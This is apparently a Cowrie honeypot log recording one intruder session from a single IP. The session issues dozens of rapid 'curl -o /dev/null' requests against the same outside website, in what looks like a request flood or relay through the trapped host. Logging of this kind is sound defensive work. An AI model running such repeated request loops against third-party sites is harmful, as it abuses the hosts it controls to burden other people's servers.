{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.624280Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.625345Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.663515Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.664510Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.711284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.712440Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.750541Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.751694Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.795885Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.796858Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.844011Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.844980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.886816Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.888000Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.928176Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.929221Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:27.969954Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:27.971174Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.014188Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.015569Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.056300Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.057350Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.102204Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.103296Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.143689Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.145019Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.183192Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.184183Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.220999Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.222137Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.259797Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.261324Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.298901Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.299870Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.340059Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.341063Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.380596Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.381837Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.421731Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.422761Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.468472Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.469537Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.542652Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.544175Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.583192Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.584171Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.623119Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.624189Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.663493Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.665228Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.712887Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.713942Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.753150Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:28.754189Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:28.791477Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.149782Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.191777Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.192852Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.229725Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.230756Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.268027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.269047Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.349219Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.350312Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.389860Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.391010Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.429367Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.430488Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.470995Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.471980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.509078Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.510435Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.548580Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.549632Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.593082Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.594171Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.630794Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.632281Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.674621Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.675806Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.715299Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.716346Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.757140Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.758561Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.802891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.803871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.842973Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.844263Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.883976Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.885391Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.923881Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.924918Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:29.974601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:29.975633Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.025914Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.027223Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.066779Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.067827Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.106684Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.107693Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.144693Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.145673Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.182220Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.183207Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.221665Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.222701Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.259771Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.260815Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.306571Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.307590Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.346570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.347560Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.430604Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.431646Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.469002Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.469966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.507020Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.508096Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.545981Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.546987Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.584793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.585788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.622950Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.623935Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.665448Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.666456Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.707165Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.708107Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.745710Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
